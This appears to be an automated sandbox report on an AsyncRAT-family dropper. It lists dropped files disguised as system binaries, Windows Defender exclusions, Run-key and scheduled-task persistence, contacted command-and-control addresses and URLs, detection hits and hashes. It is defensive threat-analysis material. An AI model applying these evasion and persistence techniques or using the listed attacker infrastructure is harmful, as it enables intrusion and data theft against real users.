Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: Yara match | File source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.All function.cmd.2eafcc0.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.dLRcE11Dkl.exe.28278a8.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.dLRcE11Dkl.exe.2815e68.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.All function.cmd.2ec0300.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: dLRcE11Dkl.exe PID: 2848, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: All function.cmd PID: 5032, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1020, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: Task Manager.exe PID: 6876, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED

                        Remote Access Functionality

                        Source: Yara match | File source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.All function.cmd.2eafcc0.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.dLRcE11Dkl.exe.28278a8.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.dLRcE11Dkl.exe.2815e68.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.All function.cmd.2ec0300.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: dLRcE11Dkl.exe PID: 2848, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: All function.cmd PID: 5032, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1020, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: Task Manager.exe PID: 6876, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED
                        MITRE ATT&CK Matrix (one column per tactic; numeric prefixes before a technique name are kept as they appear in the original matrix)

                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 Scheduled Task/Job | 111 Process Injection | 111 Masquerading | OS Credential Dumping | 321 Security Software Discovery | Remote Services | 12 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | 1 DLL Side-Loading | 51 Virtualization/Sandbox Evasion | Security Account Manager | 51 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 121 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 22 Software Packing | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph (ID: 1561590, Sample: dLRcE11Dkl.exe, Startdate: 23/11/2024, Architecture: WINDOWS, Score: 100). Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 21 other signatures. Contacted host: ip-api.com. Process tree recovered from the graph:

• dLRcE11Dkl.exe (started)
  Dropped: C:\Users\user\AppData\Roaming\svchost.exe (PE32); C:\Users\user\AppData\...\All function.cmd (PE32); C:\Users\user\AppData\...\dLRcE11Dkl.exe.log (CSV)
  Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Drops PE files with benign system names
  • All function.cmd (started)
    Dropped: C:\Users\user\AppData\...\Task Manager.exe (PE32); C:\Users\user\AppData\...\All function.exe (PE32)
    Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    • All function.exe (started)
      Dropped: C:\Users\user\...\Ratty_win32_directx11.exe (PE32+); C:\Users\...\BLACKGODDOM V.2 GOD BY LA.exe (PE32)
      Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      • BLACKGODDOM V.2 GOD BY LA.exe (started)
        Signatures: Adds a directory exclusion to Windows Defender
        • powershell.exe (started; Loading BitLocker PowerShell Module) -> conhost.exe
        • powershell.exe (started) -> conhost.exe
        • powershell.exe (started) -> conhost.exe
      • Ratty_win32_directx11.exe (started)
        Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    • Task Manager.exe (started)
      Signatures: Adds a directory exclusion to Windows Defender
      • powershell.exe (started; Loading BitLocker PowerShell Module) -> conhost.exe
      • powershell.exe (started) -> conhost.exe
  • svchost.exe (started)
    Network: ip-api.com 208.95.112.1, ports 49707, 49710, 49712 (TUT-ASUS, United States)
    Signatures: Antivirus detection for dropped file; System process connects to network (likely due to code injection or exploit); Multi AV Scanner detection for dropped file; 3 other signatures
    • powershell.exe (started; Loading BitLocker PowerShell Module) -> conhost.exe
    • powershell.exe (started) -> conhost.exe

Antivirus detection, submitted sample:

Source | Detection | Scanner | Label
dLRcE11Dkl.exe | 68% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
dLRcE11Dkl.exe | 100% | Avira | TR/Dropper.Gen
dLRcE11Dkl.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped files:

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\Task Manager.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\All function.cmd | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\All function.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Task Manager.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\All function.cmd | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\All function.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | 96% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe | 62% | ReversingLabs | Win64.Trojan.Generic
C:\Users\user\AppData\Roaming\All function.cmd | 79% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Roaming\Task Manager.exe | 82% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Roaming\svchost.exe | 92% | ReversingLabs | ByteCode-MSIL.Ransomware.CryptConsole
                        No Antivirus matches
                        No Antivirus matches
Antivirus detection, URLs:

Source | Detection | Scanner | Label
https://qualityboy.rdcw.xyz/ | 0% | Avira URL Cloud | safe
45.141.27.222 | 0% | Avira URL Cloud | safe
https://qualityboy.rdcw.xyz/Rat | 0% | Avira URL Cloud | safe
http://crl.m)IZ_ | 0% | Avira URL Cloud | safe

Contacted domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high

Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
45.141.27.222 | true | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | | high
Contacted IPs:

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561590
Start date and time: 2024-11-23 21:06:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
Analysis Mode: default
Sample name: dLRcE11Dkl.exe (renamed because the original name is a hash value)
Original Sample Name: 7eea25e9951efaa2c861551b031678b70e9e733c096877be5491457cb28561ab.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@34/38@1/1
EGA Information: Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 99%
                                                                      • Number of executed functions: 79
                                                                      • Number of non-executed functions: 9
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target All function.cmd, PID 5032 because it is empty
                                                                      • Execution Graph export aborted for target All function.exe, PID 1472 because it is empty
                                                                      • Execution Graph export aborted for target dLRcE11Dkl.exe, PID 2848 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 2884 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 5144 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 5396 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 5676 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 6596 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 7040 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • VT rate limit hit for: dLRcE11Dkl.exe
Time | Type | Description
15:07:07 | API Interceptor | 172x Sleep call for process: powershell.exe modified
21:09:19 | Task Scheduler | Run new task: svchost path: C:\Users\user\AppData\Roaming\svchost.exe
21:09:21 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
21:09:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Task Manager C:\Users\user\AppData\Local\Temp\Task Manager
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | owuP726k3d.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | WV7Gj9lJ7W.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | 18sFhgSyVK.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | UH7iNNKgPW.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | 18fvs4AVae.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | cmd.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | z81zEuzkJPHHV3KYua.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | NeftPaymentError_details__Emdtd22102024_jpg.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | owuP726k3d.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
ip-api.com | WV7Gj9lJ7W.exe | malicious | XWorm | 208.95.112.1
ip-api.com | 18sFhgSyVK.exe | malicious | XWorm | 208.95.112.1
ip-api.com | UH7iNNKgPW.exe | malicious | XWorm | 208.95.112.1
ip-api.com | 18fvs4AVae.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
ip-api.com | cmd.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | z81zEuzkJPHHV3KYua.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
ip-api.com | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
ip-api.com | NeftPaymentError_details__Emdtd22102024_jpg.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TUT-ASUS | owuP726k3d.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
TUT-ASUS | WV7Gj9lJ7W.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | 18sFhgSyVK.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | UH7iNNKgPW.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | 18fvs4AVae.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
TUT-ASUS | cmd.exe | malicious | Blank Grabber | 208.95.112.1
TUT-ASUS | z81zEuzkJPHHV3KYua.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
TUT-ASUS | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
TUT-ASUS | NeftPaymentError_details__Emdtd22102024_jpg.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
                                                                      No context
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe4QnTBz8fN3.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                        Process:C:\Users\user\AppData\Roaming\All function.cmd
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                        Process:C:\Users\user\AppData\Roaming\All function.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
